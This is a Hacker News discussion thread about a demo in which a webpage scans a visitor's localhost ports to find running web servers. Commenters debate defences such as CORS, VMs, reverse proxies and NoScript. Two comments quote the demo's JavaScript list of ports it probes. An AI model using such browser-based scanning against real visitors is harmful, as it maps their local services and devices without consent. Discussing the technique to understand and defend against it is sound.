tcp4 // 0 // 0 // * . 8080 // * . * // LISTEN

Local address being (*.8080)


> It is not sufficient security to only bind to 127.0.0.1 (the “loopback interface”)

What would be a better, more secure thing to do when you have multiple web servers on one machine behind a SSL-terminating reverse proxy?


The thing to do is not run a web browser on that machine. Run the servers in a VM.


But this seems to be able to see servers accessible to the local machine, so if my Dev server in a VM is accessible from my browser, it's accessible to any webpage in my browser?


The reverse proxy is accessible from your browser and is properly configured to not accept random requests from any webpage (See: CORS). The others are not directly accessible, but only through the reverse proxy server. Does that make sense?


not really, no. i still don't see what the reverse proxy or the VM are bringing to the table here. If i'm understanding the necessary CORS config here, it's to simply not send any access-control-allow-origin header, which does not require a VM or reverse proxy, most HTTP services do that by default.

simply being accessed through a reverse proxy instead of directly doesn't add any additional security


Actually, you are right.


I covered how he is doing this here: https://tryhackme.com/room/xss#6 (Look at all the tasks first)


Does this not work on mobile? I’m not seeing any of my web services show up on my server when opening this page in iOS Safari.

EDIT: In fact the status of local network scan doesn’t come up at all.


On my machine the requests seem to go out but the browser blocks the responses... Which seems weird, I've have expected the opposite (the browser blocking outgoing).


I had supposed to see my servers exposed but... https://imgur.com/a/hjBaYbG


Would this have implications for people who use Cryptomator, which uses loopback connections to a local WebDAV drive in order to encrypt/decrypt files?


I have use that extension quite long time but i remove it immediately after see this news!


I wonder if you could use the websocket API to scan for other (non-http) open ports.


And why?


I use NoScript, you can't see shit.


Here's a port scanning technique that doesn't use javascript:

https://blog.jeremiahgrossman.com/2006/11/browser-port-scann...


This is not helpful, because only an extremely small proportion of Web users run NoScript, and nor should they have to.


> This is not helpful, because only an extremely small proportion of Web users run NoScript, and nor should they have to.

Most (non-technical) Web users also don't run their own web servers, so they aren't affected. Among technical users, the proportion with NoScript is probably not as small.


Their routers do, along with an ever growing number of IoT devices people happily hook up to their WiFi without a second thought.

Given the long and gory history of companies releasing insecure by default devices methods like this are a legitimate entry point into a network.


Most users have a modem or router that comes with a web interface, like just about everything in the internet of things.


That's like saying that people shouldn't have to run ad blockers, that instead ad networks should behave. Sit and wait.


You can't see shit neither


yes, he can, he will see the modern equivalent of "This site is best viewed in Internet Explorer". Which in 2019 becomes "Please enable Javascript to view this page"


Honestly, such notices are shockingly unusual - most of the time (at least for the sites I encounter) they don't bother with <noscript>, you just get a broken and/or blank page.

I mostly use the web for reading blogs and articles, so the loss of dynamic sites isn't troublesome, but it's certainly not for most users.

(Edit: Some numerical context I have enabled Javascript for 194 sites over the last five years, whereas I encounter several new sites daily.)


I also browse with noscript all the time and I get them quite often. Mostly on product landing pages and Show HN demos.


Hmm, I wonder if it's confirmation bias on my end, or just a difference in what pages we each view.


> Hmm, I wonder if it's confirmation bias on my end, or just a difference in what pages we each view.

Yes.

Joking aside, I will add that I've been a NoScript/FlashBlock user for quite some time (more than a decade? I honestly can't remember), and while I run into some things that are frustrating (just had to disable NoScript for a tab to order plane tickets), it is refreshingly uncommon.

Yes, you can browse with default deny to JS and Flash.


Actually, they can: even if you enable JS, NoScript's ABE will prevent this attack: https://en.wikipedia.org/wiki/NoScript#Application_Boundarie...


Not anymore. It's not included in modern versions (after the changes in Add-Ons for Firefox's Quantum update).


That was actually funny


I only run on local on ports: 8080, 9090, 9191, 8081, 8082 and 8083. So scanning only on 3000 is a bit narrow...


It's not scanning only port 3000:

    const portsToTry = [
      80, 81, 88,
      3000, 3001, 3030, 3031, 3333,
      4000, 4001, 4040, 4041, 4444,
      5000, 5001, 5050, 5051, 5555,
      6000, 6001, 6060, 6061, 6666,
      7000, 7001, 7070, 7071, 7777,
      8000, 8001, 8080, 8081, 8888,
      9000, 9001, 9090, 9091, 9999,
    ];
view-source:http://http.jameshfisher.com/2019/05/26/i-can-see-your-local... :125


It does not only scan 3000. From the source code:

      const portsToTry = [
        80, 81, 88,
        3000, 3001, 3030, 3031, 3333,
        4000, 4001, 4040, 4041, 4444,
        5000, 5001, 5050, 5051, 5555,
        6000, 6001, 6060, 6061, 6666,
        7000, 7001, 7070, 7071, 7777,
        8000, 8001, 8080, 8081, 8888,
        9000, 9001, 9090, 9091, 9999,
      ];


On my machine it seems to be scanning for lots of ports between :80 and :9999. I think it's using 3000 as an example in the text only.




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: